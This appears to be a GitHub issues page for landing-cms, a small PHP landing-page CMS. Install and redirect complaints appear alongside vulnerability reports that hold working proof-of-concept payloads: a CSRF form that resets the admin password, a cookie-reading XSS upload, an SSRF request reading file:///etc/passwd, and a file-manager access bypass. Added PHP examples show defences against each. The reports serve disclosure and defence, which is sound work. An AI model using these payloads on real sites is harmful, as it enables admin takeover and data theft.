elias-black / landing-cms
A simple CMS for landing pages
License: GNU Lesser General Public License v2.1
Hello, thanks for this app. The issue is... I can't install this CMS. Then change all permissions, go to /cms panel and error 404. My project URL is http://localhost:44333/www/test-cms/ When I want to go to http://localhost:44333/www/test-cms/ the app redirects to http://localhost:44333/cms/
Thanks for your help.
P.S.: This issue also happens on the live server.
Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/public.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\web\index.php on line 24
Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/password.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php on line 112
Warning: Cannot modify header information - headers already sent by (output started at E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php:112) in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\utils.class.php on line 37
http://192.168.18.130/cms/password/
I can change the admin's password when the admin clicks the CSRF HTML file.
payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.18.130/cms/password/" method="POST">
<input type="hidden" name="pwd1" value="12345" />
<input type="hidden" name="pwd2" value="12345" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
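A synchronizer-token check that would reject the cross-site form above, as an added example that is not part of the original report or the project's code. The function names and the `csrf` field are hypothetical; only `pwd1` and `pwd2` come from the report, and the `$session` array stands in for `$_SESSION`.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helpers, not landing-cms code.

function csrf_token(array &$session): string
{
    // One random token per session, created on first use.
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf'] ?? '';
    $supplied = $post['csrf'] ?? '';
    // hash_equals compares in constant time; an empty token never matches.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

function handle_password_change(array $session, array $post): string
{
    if (!csrf_valid($session, $post)) {
        return '403 rejected: missing or wrong CSRF token';
    }
    if (($post['pwd1'] ?? '') === '' || $post['pwd1'] !== ($post['pwd2'] ?? null)) {
        return '400 rejected: passwords empty or do not match';
    }
    return '200 password changed'; // real code would hash and store it here
}

// Constructed demo input.
$session = [];
$token = csrf_token($session);

// Cross-site form as in the report: only pwd1/pwd2, no token.
echo handle_password_change($session, ['pwd1' => '12345', 'pwd2' => '12345']), "\n";
// Same-site form that embedded the token in a hidden field.
echo handle_password_change($session,
    ['pwd1' => 'n3w-pass', 'pwd2' => 'n3w-pass', 'csrf' => $token]), "\n";
```

Setting the session cookie with `SameSite=Lax` or `Strict` and requiring the current password on this form are complementary controls.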
http://infozavri.my.to/cms/
Some blocks do not appear on the front-end,
but appear on the back-end.
password: *** (removed after 2 days of no-answer)
Landing-CMS dead as many others...
First access the file management page, then click new file to upload the file, select the html file format.
http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php
payload: <script>alert(document.cookie)</script>
When we input the file content as payload, we find that the front end does not allow input /, so we can capture the package and modify the content or paste the payload directly into the file content.
Right-click the file and select "show url", open the file URL to trigger xss.
When the administrator opens the file after uploading the file, it can also trigger xss.
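One way to stop a user-created HTML file from executing script on the site's origin, as an added example that is not part of the original report or of Responsive FileManager. `upload_response_headers()` and its allow-list are hypothetical, and it assumes files in the upload directory are served through a PHP script that can set headers.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helper, not Responsive FileManager code.

function upload_response_headers(string $filename): array
{
    // Types that are safe to render inline from the site's own origin.
    $inline = ['png' => 'image/png', 'jpg' => 'image/jpeg',
               'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $headers = [
        'X-Content-Type-Options'  => 'nosniff',                     // no sniffing into text/html
        'Content-Security-Policy' => "default-src 'none'; sandbox", // scripts cannot run
    ];
    if (isset($inline[$ext])) {
        $headers['Content-Type'] = $inline[$ext];
        $headers['Content-Disposition'] = 'inline';
    } else {
        // html, htm, svg, js and anything unknown is downloaded, never rendered.
        $headers['Content-Type'] = 'application/octet-stream';
        $headers['Content-Disposition'] =
            "attachment; filename*=UTF-8''" . rawurlencode(basename($filename));
    }
    return $headers;
}

// Constructed sample file names.
foreach (['logo.png', 'test.html'] as $name) {
    $h = upload_response_headers($name);
    printf("%-10s %s | %s\n", $name, $h['Content-Type'], $h['Content-Disposition']);
}
```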
An SSRF vulnerability was discovered in landing-cms. There is an SSRF vulnerability that allows attackers to read sensitive server information via /assets/vendor/responsive_filemanager_9.12.1/filemanager/upload.php
post: fldr=test11&url=file:///etc/passwd
and then cos would touch a file named fldr and the name of ssrf file
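A validation step for a user-supplied `url` parameter like the one in the request above, as an added example that is not part of the original report or of Responsive FileManager. `is_safe_fetch_url()` is a hypothetical helper, and the resolver table, host names and addresses are constructed so the demo runs offline.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helper, not Responsive FileManager code.

function is_safe_fetch_url(string $url, ?callable $resolver = null): bool
{
    $resolver = $resolver ?? 'gethostbynamel';   // injectable so the demo runs offline
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;                             // file:///etc/passwd parses with no host
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;                             // only web schemes may be fetched
    }
    $ips = $resolver($parts['host']);
    if (!is_array($ips) || $ips === []) {
        return false;                             // unresolvable: fail closed
    }
    foreach ($ips as $ip) {
        // Every resolved address must be outside private and reserved ranges.
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}

// Constructed resolver table standing in for DNS.
$fakeDns = function (string $host) {
    $table = ['cdn.example.com' => ['93.184.216.34'],
              'intranet.example.com' => ['10.0.0.5']];
    if (filter_var($host, FILTER_VALIDATE_IP)) {
        return [$host];                           // IP literals resolve to themselves
    }
    return $table[$host] ?? false;
};

$samples = [
    'file:///etc/passwd',                         // value from the report above
    'http://127.0.0.1/',
    'http://intranet.example.com/status',
    'https://cdn.example.com/logo.png',
];
foreach ($samples as $url) {
    printf("%-38s %s\n", $url, is_safe_fetch_url($url, $fakeDns) ? 'allow' : 'deny');
}
```

The check only holds if the subsequent fetch connects to the address that was validated and does not follow redirects without re-validating them.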
Hello, Ilya!
Your CMS is simply ideal, and simple. It is exactly what I started writing more than once, abandoned because of pressing deadlines, and shelved.
The only thing that is badly missing is an implementation of multi-fields. This is useful when, for example, the landing page has an image gallery, or a list of partners, or, for example, a product catalog.
This addition would make my life much easier, so I am even willing to thank you financially.
It would also be cool to see selects and a file picker among the field types.
If anything, write to my email: [email protected]
First of all, I did not enter the password to access and found it was blocked.
But I can still access the file management page.
http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php
The normal logical operation is to first enter the password to access the main page, then click add field, create the type as file uploader, and finally we can upload files in the main page.
Whenever I click on http://localhost/cms/cms/ it's redirecting to http://localhost/cms/password/ and showing a 404 error...